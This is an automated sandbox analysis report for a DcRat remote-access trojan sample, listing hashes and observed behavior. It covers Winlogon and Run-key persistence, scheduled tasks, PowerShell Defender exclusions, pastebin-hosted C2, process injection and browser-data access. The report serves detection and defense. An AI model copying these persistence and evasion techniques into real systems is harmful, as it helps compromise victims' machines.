Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26/01/2025, 13:33
Static task
static1
Behavioral task
behavioral1
Sample
af4b66ff9b1f5830080860380efa81e4.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
af4b66ff9b1f5830080860380efa81e4.exe
Resource
win10v2004-20241007-en
General
-
Target
af4b66ff9b1f5830080860380efa81e4.exe
-
Size
7.0MB
-
MD5
af4b66ff9b1f5830080860380efa81e4
-
SHA1
53cc9bb12117af3f77354733abc4ef48ad339932
-
SHA256
429a6c2aa2f62fe5b656de97dd25152cd8e653d92a8dd5e75d067308b784bfaf
-
SHA512
8796e8f5cd290dc5cbf009a886796b61d7137630c89067450d863596cd9296eed846ffd5cd53e6750a5c52ba2741f95e3d8169c010ec307371c304a056acf431
-
SSDEEP
196608:M3NyJWZ3HC5ObjKh7+mSGZ5gPZaQC4b5DV2h:MdOWZyCUpt8b9Vy
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\MsServerHost.exe\", \"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\MsServerHost.exe\", \"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\", \"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\winlogon.exe\"" MsServerHost.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2912 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3448 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4340 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1172 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2188 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2372 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5052 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 556 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1944 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3968 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2252 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2660 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4056 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4968 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3284 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1108 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1232 2484 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4872 2484 schtasks.exe 106 -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 3448 created 3540 3448 twain32.exe 56 PID 3448 created 3540 3448 twain32.exe 56 PID 3448 created 3540 3448 twain32.exe 56 PID 3448 created 3540 3448 twain32.exe 56 PID 3448 created 3540 3448 twain32.exe 56 PID 3448 created 3540 3448 twain32.exe 56 PID 3172 created 3540 3172 updater.exe 56 PID 3172 created 3540 3172 updater.exe 56 PID 3172 created 3540 3172 updater.exe 56 PID 3172 created 3540 3172 updater.exe 56 PID 3172 created 3540 3172 updater.exe 56 PID 3172 created 3540 3172 updater.exe 56 PID 3172 created 3540 3172 updater.exe 56 -
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4232 powershell.exe 4700 powershell.exe 1992 powershell.exe 2776 powershell.exe 4564 powershell.exe 764 powershell.exe 4376 powershell.exe 4564 powershell.exe 4500 powershell.exe 1348 powershell.exe 1396 powershell.exe 4052 powershell.exe 3984 powershell.exe 4976 powershell.exe 3248 powershell.exe 3284 powershell.exe 3140 powershell.exe 4984 powershell.exe 4260 powershell.exe 404 powershell.exe 1420 powershell.exe 2776 powershell.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation MsServerHost.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation af4b66ff9b1f5830080860380efa81e4.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation MpDefenderCoreService.exe -
Executes dropped EXE 5 IoCs
pid Process 3088 MpDefenderCoreService.exe 3448 twain32.exe 3172 updater.exe 2888 MsServerHost.exe 1592 fontdrvhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\Recovery\\WindowsRE\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Public\\winlogon.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Public\\winlogon.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\Recovery\\WindowsRE\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Crashpad\\reports\\fontdrvhost.exe\"" MsServerHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 pastebin.com 17 pastebin.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1720 powercfg.exe 3892 powercfg.exe 924 powercfg.exe 4276 powercfg.exe 876 powercfg.exe 3060 cmd.exe 1352 powercfg.exe 624 cmd.exe 1760 powercfg.exe 2408 powercfg.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\MsServerHostM svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\winlogon svchost.exe File created \??\c:\Windows\System32\-63gkj.exe csc.exe File opened for modification C:\Windows\System32\Tasks\fontdrvhostf svchost.exe File opened for modification C:\Windows\System32\Tasks\dllhost svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Tasks\winlogonw svchost.exe File created \??\c:\Windows\System32\CSC5E2D5D3AA49F40418C336E32307AFD6A.TMP csc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\MsServerHost svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File opened for modification C:\Windows\System32\Tasks\fontdrvhost svchost.exe File opened for modification C:\Windows\System32\Tasks\dllhostd svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3448 set thread context of 2652 3448 twain32.exe 99 PID 3172 set thread context of 380 3172 updater.exe 122 PID 3172 set thread context of 1264 3172 updater.exe 129 PID 3172 set thread context of 220 3172 updater.exe 130 -
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Crashpad\reports\5b884080fd4f94 MsServerHost.exe File created C:\Program Files (x86)\Windows Multimedia Platform\5940a34987c991 MsServerHost.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe MsServerHost.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\5b884080fd4f94 MsServerHost.exe File created C:\Program Files\Google\Chrome\updater.exe twain32.exe File created C:\Program Files\Crashpad\reports\fontdrvhost.exe MsServerHost.exe File opened for modification C:\Program Files\Crashpad\reports\fontdrvhost.exe MsServerHost.exe File created C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe MsServerHost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 632 sc.exe 3588 sc.exe 552 sc.exe 1368 sc.exe 2252 sc.exe 4084 sc.exe 3120 sc.exe 2800 sc.exe 380 sc.exe 2128 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpDefenderCoreService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language af4b66ff9b1f5830080860380efa81e4.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02losjushyjtzxpe svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001800123868145D" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={46D1E072-05E8-424B-81E4-41BBD7F0FDBC}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02losjushyjtzxpe svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02losjushyjtzxpe" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02losjushyjtzxpe\DeviceId = "<Data LastUpdatedTime=\"1737898411\"><User username=\"02LOSJUSHYJTZXPE\"/></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings MpDefenderCoreService.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings MsServerHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1172 schtasks.exe 556 schtasks.exe 4056 schtasks.exe 4968 schtasks.exe 3448 schtasks.exe 1944 schtasks.exe 3968 schtasks.exe 2660 schtasks.exe 1108 schtasks.exe 1232 schtasks.exe 2912 schtasks.exe 4340 schtasks.exe 2188 schtasks.exe 2372 schtasks.exe 5052 schtasks.exe 2252 schtasks.exe 3284 schtasks.exe 4872 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3448 twain32.exe 3448 twain32.exe 4700 powershell.exe 4700 powershell.exe 3448 twain32.exe 3448 twain32.exe 3448 twain32.exe 3448 twain32.exe 3448 twain32.exe 3448 twain32.exe 3448 twain32.exe 3448 twain32.exe 2652 dialer.exe 2652 dialer.exe 1420 powershell.exe 1420 powershell.exe 2652 dialer.exe 2652 dialer.exe 1420 powershell.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 1420 powershell.exe 2652 dialer.exe 2652 dialer.exe 3448 twain32.exe 3448 twain32.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe 2652 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4700 powershell.exe Token: SeDebugPrivilege 2652 dialer.exe Token: SeShutdownPrivilege 1720 powercfg.exe Token: SeCreatePagefilePrivilege 1720 powercfg.exe Token: SeShutdownPrivilege 1352 powercfg.exe Token: SeCreatePagefilePrivilege 1352 powercfg.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeShutdownPrivilege 3892 powercfg.exe Token: SeCreatePagefilePrivilege 3892 powercfg.exe Token: SeShutdownPrivilege 924 powercfg.exe Token: SeCreatePagefilePrivilege 924 powercfg.exe Token: SeIncreaseQuotaPrivilege 1420 powershell.exe Token: SeSecurityPrivilege 1420 powershell.exe Token: SeTakeOwnershipPrivilege 1420 powershell.exe Token: SeLoadDriverPrivilege 1420 powershell.exe Token: SeSystemProfilePrivilege 1420 powershell.exe Token: SeSystemtimePrivilege 1420 powershell.exe Token: SeProfSingleProcessPrivilege 1420 powershell.exe Token: SeIncBasePriorityPrivilege 1420 powershell.exe Token: SeCreatePagefilePrivilege 1420 powershell.exe Token: SeBackupPrivilege 1420 powershell.exe Token: SeRestorePrivilege 1420 powershell.exe Token: SeShutdownPrivilege 1420 powershell.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeSystemEnvironmentPrivilege 1420 powershell.exe Token: SeRemoteShutdownPrivilege 1420 powershell.exe Token: SeUndockPrivilege 1420 powershell.exe Token: SeManageVolumePrivilege 1420 powershell.exe Token: 33 1420 powershell.exe Token: 34 1420 powershell.exe Token: 35 1420 powershell.exe Token: 36 1420 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2096 svchost.exe Token: SeIncreaseQuotaPrivilege 2096 svchost.exe Token: SeSecurityPrivilege 2096 svchost.exe Token: SeTakeOwnershipPrivilege 2096 svchost.exe Token: SeLoadDriverPrivilege 2096 svchost.exe Token: SeSystemtimePrivilege 2096 svchost.exe Token: SeBackupPrivilege 2096 svchost.exe Token: SeRestorePrivilege 2096 svchost.exe Token: SeShutdownPrivilege 2096 svchost.exe Token: SeSystemEnvironmentPrivilege 2096 svchost.exe Token: SeUndockPrivilege 2096 svchost.exe Token: SeManageVolumePrivilege 2096 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2096 svchost.exe Token: SeIncreaseQuotaPrivilege 2096 svchost.exe Token: SeSecurityPrivilege 2096 svchost.exe Token: SeTakeOwnershipPrivilege 2096 svchost.exe Token: SeLoadDriverPrivilege 2096 svchost.exe Token: SeSystemtimePrivilege 2096 svchost.exe Token: SeBackupPrivilege 2096 svchost.exe Token: SeRestorePrivilege 2096 svchost.exe Token: SeShutdownPrivilege 2096 svchost.exe Token: SeSystemEnvironmentPrivilege 2096 svchost.exe Token: SeUndockPrivilege 2096 svchost.exe Token: SeManageVolumePrivilege 2096 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2096 svchost.exe Token: SeIncreaseQuotaPrivilege 2096 svchost.exe Token: SeSecurityPrivilege 2096 svchost.exe Token: SeTakeOwnershipPrivilege 2096 svchost.exe Token: SeLoadDriverPrivilege 2096 svchost.exe Token: SeSystemtimePrivilege 2096 svchost.exe Token: SeBackupPrivilege 2096 svchost.exe Token: SeRestorePrivilege 2096 svchost.exe -
